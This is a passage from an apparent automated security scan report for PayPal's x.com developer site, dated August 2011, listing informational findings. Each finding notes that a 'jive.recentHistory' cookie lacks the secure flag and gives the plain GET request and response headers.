Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_ToddS

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPal_ToddS HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c323839313b332c323430323b332c3133363236393b332c3133313833303b332c31323739393b332c3133373331333b332c3133373135383b332c3132393239303b332c3133393730313b332c3132323335343b; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=172832 t=1313157134792842
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.186. https://www.x.com/people/Praveen  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Praveen

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Praveen HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35353331393b332c35373137393b332c35333436333b332c35333437343b332c323030383b332c3133363935343b332c3133373131353b332c36303039313b332c35333735313b332c3133383538323b; Expires=Sun, 11-Sep-2011 13:51:53 GMT; Path=/
Vary: User-Agent
JP: D=139937 t=1313157113112925
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.187. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Praveen/blog/2011/01/31/icanhas-instant-app-approval HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c35353331393b332c35333437343b332c323030383b332c35333436333b332c35373137393b332c3133363935343b332c3133373131353b332c36303039313b332c35333735313b332c3133383538323b; Expires=Sun, 11-Sep-2011 13:51:53 GMT; Path=/
Vary: User-Agent
JP: D=129836 t=1313157113665921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.188. https://www.x.com/people/RightWayMail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/RightWayMail

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/RightWayMail HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134313133383b332c3131353037373b332c38323534333b332c3130383730353b332c3131303831343b332c38383139383b332c3131303734313b332c3131353130373b332c38353530363b332c3131313737343b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=143442 t=1313157149181583
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.189. https://www.x.com/people/S.Aijaz  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/S.Aijaz

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/S.Aijaz HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3132393239303b332c3134303635343b332c3133393730313b332c3132323335343b332c3133343430323b332c39313330313b332c34383739343b332c31303737303b332c31393037313b332c33353136303b; Expires=Sun, 11-Sep-2011 13:52:11 GMT; Path=/
Vary: User-Agent
JP: D=107761 t=1313157131723635
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.190. https://www.x.com/people/SRS  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/SRS

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/SRS HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38373839383b332c3133383934323b332c3131363438333b332c32333938353b332c3131303838353b332c33393238333b332c3131383939313b332c3134313133383b332c39323635363b332c3132323433393b; Expires=Sun, 11-Sep-2011 13:52:28 GMT; Path=/
Vary: User-Agent
JP: D=95619 t=1313157148836785
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.191. https://www.x.com/people/Saleem  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Saleem

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Saleem HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333437343b332c3133373131353b332c3133363935343b332c35333735313b332c36303039313b332c323030383b332c3133383538323b332c3133373331333b332c35353331393b332c3133363236393b; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=174302 t=1313157112089068
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.192. https://www.x.com/people/Shade8934  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Shade8934

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Shade8934 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c3133373131353b332c3133363935343b332c3133383538323b332c35333735313b332c36303039313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=78825 t=1313157110665049
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.193. https://www.x.com/people/Suneetha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Suneetha

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Suneetha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133373135383b332c3132393239303b332c3133393730313b332c3132323335343b332c3133343430323b332c39313330313b332c3134303635343b332c34383739343b332c31303737303b332c31393037313b; Expires=Sun, 11-Sep-2011 13:52:12 GMT; Path=/
Vary: User-Agent
JP: D=77775 t=1313157132121636
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.194. https://www.x.com/people/admin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/admin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/admin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:37 GMT; Path=/
Vary: User-Agent
JP: D=92314 t=1313157157248318
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.195. https://www.x.com/people/amypiazza00  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/amypiazza00

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/amypiazza00 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c36303039313b332c3133383538323b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=166730 t=1313157109973921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.196. https://www.x.com/people/angelleye  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/angelleye

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/angelleye HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c323430323b332c3133373331333b332c3133313833303b332c3133363236393b332c31323739393b332c3133373135383b332c3132393239303b332c3133393730313b332c3132323335343b332c3133343430323b; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=188523 t=1313157134358773
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.197. https://www.x.com/people/billday  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/billday

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/billday HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b332c3131303734313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:35 GMT; Path=/
Vary: User-Agent
JP: D=155484 t=1313157155442148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.198. https://www.x.com/people/blingnation2010  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/blingnation2010

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/blingnation2010 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b332c35373137393b332c3133363935343b; Expires=Sun, 11-Sep-2011 13:51:57 GMT; Path=/
Vary: User-Agent
JP: D=82638 t=1313157117852719
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.199. https://www.x.com/people/bryngregory  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/bryngregory

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/bryngregory HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:49 GMT; Path=/
Vary: User-Agent
JP: D=142323 t=1313157169831259
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.200. https://www.x.com/people/das_licht  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/das_licht

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/das_licht HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133373331333b332c3132393239303b332c39313330313b332c3132323335343b332c3133393730313b332c3134303635343b332c3133373135383b332c3133343430323b332c34383739343b332c31303737303b; Expires=Sun, 11-Sep-2011 13:52:12 GMT; Path=/
Vary: User-Agent
JP: D=93807 t=1313157132393620
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.201. https://www.x.com/people/dchankhour  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/dchankhour

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/dchankhour HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:44 GMT; Path=/
Vary: User-Agent
JP: D=75356 t=1313157164475506
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.202. https://www.x.com/people/eferreira  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/eferreira

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/eferreira HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133343430323b332c34383739343b332c39313330313b332c3134303635343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=84607 t=1313157130615032
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.203. https://www.x.com/people/encore  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/encore

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/encore HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c31303939373b332c3133363236393b332c31323739393b332c323839313b332c323430323b332c3133313833303b332c323032353b; Expires=Sun, 11-Sep-2011 13:52:17 GMT; Path=/
Vary: User-Agent
JP: D=147969 t=1313157137124462
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.204. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:48 GMT; Path=/
Vary: User-Agent
JP: D=175267 t=1313157108233489
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.205. https://www.x.com/people/gazugafan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gazugafan

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/gazugafan HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
